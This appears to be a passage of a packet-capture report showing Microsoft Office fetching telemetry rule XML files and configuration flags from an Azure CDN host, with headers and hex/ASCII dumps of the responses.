                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 41 41 77 41 43 34 41 4d 41 42 61 41 4d 4d 47 41 77 41 41 22 2c 22 45 6e 61 62 6c 65 55 70 64 61 74 65 64 4e 70 73 52 61 74 69 6e 67 4c 61 62 65 6c 73 22 3a 74 72 75 65 2c 22 49 73 53 75 72 76 65 79 45 78 70 65 72 69 6d 65 6e 74 49 6e 74 65 67 72 61 74 69 6f 6e 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 45 78 63 65 6c 2e 43 61 6d 70 61 69 67 6e 73 2e 32 30 22 3a 22 43 68 49 6b 4d 51 41 30 41 47 59 41 4f 41 41 33 41 44 59 41 59 51 42 6d 41 43 30 41 5a 41 41 79 41 44 41 41 4d 67 41 74 41 44 51 41 4d 51 41 33 41 44 49 41 4c 51 41 35 41 47 55 41 5a 41 42 6c 41 43 30 41 4d 67 42 68 41 47 4d 41 4f 51 41 34 41 44 4d 41 4e 67 42 68 41 47 51 41 59 77 42 6d 41 44 49 41 4b 68 41 41 4b 68 41 41 41 51 57 41 6d 70 34 42 41 45 6f 51 41 41 45 46 67 4d 37 61 41 77 41 42
                                                                                                        Data Ascii: AAwAC4AMABaAMMGAwAA","EnableUpdatedNpsRatingLabels":true,"IsSurveyExperimentIntegrationEnabled":true,"Excel.Campaigns.20":"ChIkMQA0AGYAOAA3ADYAYQBmAC0AZAAyADAAMgAtADQAMQA3ADIALQA5AGUAZABlAC0AMgBhAGMAOQA4ADMANgBhAGQAYwBmADIAKhAAKhAAAQWAmp4BAEoQAAEFgM7aAwAB
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 6c 69 63 79 22 3a 66 61 6c 73 65 2c 22 45 6e 66 6f 72 63 65 53 48 41 32 53 69 67 6e 61 74 75 72 65 22 3a 74 72 75 65 2c 22 47 65 74 53 65 74 75 70 44 65 6c 69 76 65 72 79 46 61 6c 6c 62 61 63 6b 46 50 41 53 65 74 74 69 6e 67 22 3a 22 46 41 30 30 30 30 30 30 30 34 33 3b 46 41 30 30 30 30 30 30 30 35 39 3b 22 2c 22 53 65 74 75 70 44 65 6c 69 76 65 72 79 46 61 6c 6c 62 61 63 6b 22 3a 74 72 75 65 2c 22 47 65 74 41 64 64 69 6e 73 42 75 74 74 6f 6e 4f 6e 42 61 63 6b 53 74 61 67 65 42 65 6c 6f 77 4f 70 65 6e 44 69 76 69 64 65 72 22 3a 74 72 75 65 2c 22 47 65 74 41 64 64 69 6e 73 42 75 74 74 6f 6e 4f 6e 42 61 63 6b 53 74 61 67 65 42 65 6c 6f 77 4f 70 74 69 6f 6e 73 44 69 76 69 64 65 72 22 3a 66 61 6c 73 65 2c 22 47 65 74 41 64 64 69 6e 73 42 75 74 74 6f 6e 4f 6e
                                                                                                        Data Ascii: licy":false,"EnforceSHA2Signature":true,"GetSetupDeliveryFallbackFPASetting":"FA000000043;FA000000059;","SetupDeliveryFallback":true,"GetAddinsButtonOnBackStageBelowOpenDivider":true,"GetAddinsButtonOnBackStageBelowOptionsDivider":false,"GetAddinsButtonOn
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 31 2c 22 72 36 38 30 30 30 5f 33 22 3a 31 2c 22 72 36 38 30 30 31 5f 32 22 3a 31 2c 22 72 31 38 30 30 30 33 5f 35 22 3a 31 2c 22 72 31 38 30 30 32 36 5f 32 22 3a 31 2c 22 72 31 38 30 30 32 37 5f 32 22 3a 31 2c 22 72 31 38 30 30 32 38 5f 31 22 3a 31 2c 22 72 31 38 30 30 32 39 5f 30 22 3a 31 2c 22 72 31 38 30 30 33 30 5f 30 22 3a 31 2c 22 72 31 38 30 30 33 31 5f 30 22 3a 31 2c 22 72 31 38 30 30 33 32 5f 30 22 3a 31 2c 22 72 31 38 30 30 33 34 5f 30 22 3a 31 2c 22 72 31 38 30 30 34 33 5f 31 22 3a 31 2c 22 72 31 38 30 30 34 39 5f 30 22 3a 31 2c 22 72 31 38 30 30 35 31 5f 31 22 3a 31 2c 22 72 31 38 30 30 35 32 5f 30 22 3a 31 2c 22 72 31 38 30 30 35 37 5f 31 22 3a 31 2c 22 72 31 38 30 30 35 38 5f 31 22 3a 31 2c 22 72 31 38 30 30 35 39 5f 31 22 3a 31 2c 22 72 31
                                                                                                        Data Ascii: 1,"r68000_3":1,"r68001_2":1,"r180003_5":1,"r180026_2":1,"r180027_2":1,"r180028_1":1,"r180029_0":1,"r180030_0":1,"r180031_0":1,"r180032_0":1,"r180034_0":1,"r180043_1":1,"r180049_0":1,"r180051_1":1,"r180052_0":1,"r180057_1":1,"r180058_1":1,"r180059_1":1,"r1
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 72 6c 50 61 74 68 46 6f 72 53 61 66 65 6c 69 6e 6b 73 22 3a 74 72 75 65 2c 22 43 4c 50 2e 46 47 2e 4a 75 73 74 69 66 69 63 61 74 69 6f 6e 4f 74 68 65 72 57 69 74 68 53 65 63 75 72 69 74 79 57 61 72 6e 69 6e 67 22 3a 74 72 75 65 2c 22 46 47 2e 52 65 6d 6f 76 65 54 72 75 73 74 4f 6e 65 44 72 69 76 65 46 65 61 74 75 72 65 22 3a 74 72 75 65 2c 22 47 72 61 70 68 69 63 73 46 69 6c 74 65 72 45 78 74 72 61 4c 6f 63 6b 64 6f 77 6e 22 3a 74 72 75 65 2c 22 43 4c 50 2e 43 47 2e 45 6e 61 62 6c 65 4e 6f 74 69 66 69 63 61 74 69 6f 6e 54 72 61 79 55 70 64 61 74 65 73 22 3a 66 61 6c 73 65 2c 22 43 4c 50 2e 43 47 2e 4c 6f 63 61 74 69 6f 6e 50 69 63 6b 65 72 44 69 61 6c 6f 67 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 46 69 78 22 3a 66 61 6c 73 65 2c 22 43 4c 50 2e 55 73 65
                                                                                                        Data Ascii: rlPathForSafelinks":true,"CLP.FG.JustificationOtherWithSecurityWarning":true,"FG.RemoveTrustOneDriveFeature":true,"GraphicsFilterExtraLockdown":true,"CLP.CG.EnableNotificationTrayUpdates":false,"CLP.CG.LocationPickerDialogInitializationFix":false,"CLP.Use
                                                                                                        2024-12-09 12:48:53 UTC8192INData Raw: 6f 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 46 53 6d 65 6c 6c 73 4c 69 6b 65 4d 65 74 72 6f 46 69 6c 65 43 61 6e 63 65 6c 61 62 6c 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 43 6f 61 75 74 68 41 75 74 6f 53 61 76 65 49 6e 53 79 6e 63 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 45 78 65 63 75 74 65 4d 65 72 67 65 49 6e 73 74 61 6e 63 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 4c 6f 61 64 43 6d 64 4c 69 6e 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 57 6f 72 6b 62 6f 6f 6b 44 69 72 74 79 4e 6f 52 65 76 69 73 69 6f 6e 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 50 72 65 73 65 6e 63 65 53 65 65 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a
                                                                                                        Data Ascii: o":{"EventFlag":512},"FSmellsLikeMetroFileCancelable":{"EventFlag":2},"CoauthAutoSaveInSync":{"EventFlag":512},"ExecuteMergeInstance":{"EventFlag":512},"LoadCmdLine":{"EventFlag":512},"WorkbookDirtyNoRevisions":{"EventFlag":2},"PresenceSeen":{"EventFlag":


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        4192.168.2.84972513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:29 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:29 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:29 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 218853
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public
                                                                                                        Last-Modified: Sun, 08 Dec 2024 17:57:40 GMT
                                                                                                        ETag: "0x8DD17B1CF2A0A7C"
                                                                                                        x-ms-request-id: df7ee72c-101e-0034-6bad-4996ff000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124929Z-r1cf579d7788pwqzhC1EWRrpd800000008hg000000007y19
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:29 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                        2024-12-09 12:49:30 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        5192.168.2.84972713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:32 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:32 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 3788
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                        x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124932Z-r1cf579d778z4wflhC1EWRa3h000000008gg000000001xsw
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:32 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        6192.168.2.84972913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:32 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:32 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 2160
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                        x-ms-request-id: 937d31be-301e-006e-4fe0-49f018000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124932Z-r1cf579d7788c742hC1EWRr97n00000002n0000000002wx9
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:32 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        7192.168.2.84972813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:32 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
